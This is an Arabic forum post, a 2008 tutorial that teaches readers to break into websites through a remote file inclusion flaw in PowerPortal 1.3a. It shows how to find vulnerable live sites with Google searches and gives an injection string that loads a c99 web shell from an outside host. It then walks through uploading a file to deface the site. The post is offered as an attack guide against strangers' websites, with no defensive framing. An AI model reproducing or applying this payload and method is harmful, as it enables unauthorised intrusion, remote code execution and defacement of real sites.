مع بعض أحلى
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.
مع بعض أحلى

منتدى مع بعض أحلى و أكيد بيك أحلى


أهلا وسهلا بك زائرنا الكريم, أنت لم تقم بتسجيل الدخول بعد! يشرفنا أن تقوم بالدخول أو التسجيل إذا رغبت بالمشاركة في المنتدى

آضهآر آلثغرآت من آلميلورم

اذهب الى الأسفل  رسالة [صفحة 1 من اصل 1]

1آضهآر آلثغرآت من آلميلورم Empty آضهآر آلثغرآت من آلميلورم السبت أغسطس 16, 2008 1:54 pm

myth of undertaker

myth of undertaker
مدير عام
مدير عام

السلام عليكم ورحمه الله وبركاته ..




تفضلو الدرس





بسم الله الرحمن الرحيم
نبدأ الدرس

(درس إختراق المواقع عن طريق ثغرات الفايل انكلود)
اول شىء ندخل إلى موقع من مواقع الثغرات


تظهر لنا الصورة التالية :
ننزل إلى القسم المسمى
WEb apps







.

آضهآر آلثغرآت من آلميلورم 1



و نختار اول ثغرة من الأعلى المسماة بإسم
PowerPortal 1.3a (index.php) Remote File Include Vulnerability
الان نقوم بشرح اسم الثغرة
اول جزء
PowerPortal 1.3a
هذا اسم الإسكربت المصاب بالثغرة

(index.php)
هذا اسم الملف المصاب
Remote File Include Vulnerability
هذا نوع الثغرة و واضح انها من نوع فايل انكلود و هذا اسهل نوع من انواع الثغرات تقريبا



تظهر لنا الثغرة بهذا الشكل و الشرح على الصورة





آضهآر آلثغرآت من آلميلورم 2


الان فهمنا كل اجزاء الثغرة و طبعا هذا يرجع إلى قوتك فى اللغة الإنجليزية

الان ندخل إلى جوجل و نكتب الجزء الذى لونته فى الصورة السابقة لكى تظهر لنا المواقع المصابة





آضهآر آلثغرآت من آلميلورم 3


سنقوم بإختيار موقع منهم و نتابع الصورة :





آضهآر آلثغرآت من آلميلورم 4



الان سنحذف كلمة
top.php
و نضغط الاتى



كود:
/index.php?file_name[]=http://www.soqor.net/tools/c99.txt?
بعد اسم الموقع
و نضغط
enter
لكى تظهر لنا الصفحة التالية




آضهآر آلثغرآت من آلميلورم 5



الان ننزل إلى اسفل الصفحة إلى خانة
upload
و نضغط على زر
browse
لكى نحدد ملف لكى نرفعه لنعلن عن اختراقنا للموقع
و نضغط
upload

كما فى الصورة




آضهآر آلثغرآت من آلميلورم 6


والنتيجه





آضهآر آلثغرآت من آلميلورم 7




تم بحمد الله الدرس






https://together.roo7.biz

الرجوع الى أعلى الصفحة  رسالة [صفحة 1 من اصل 1]

صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى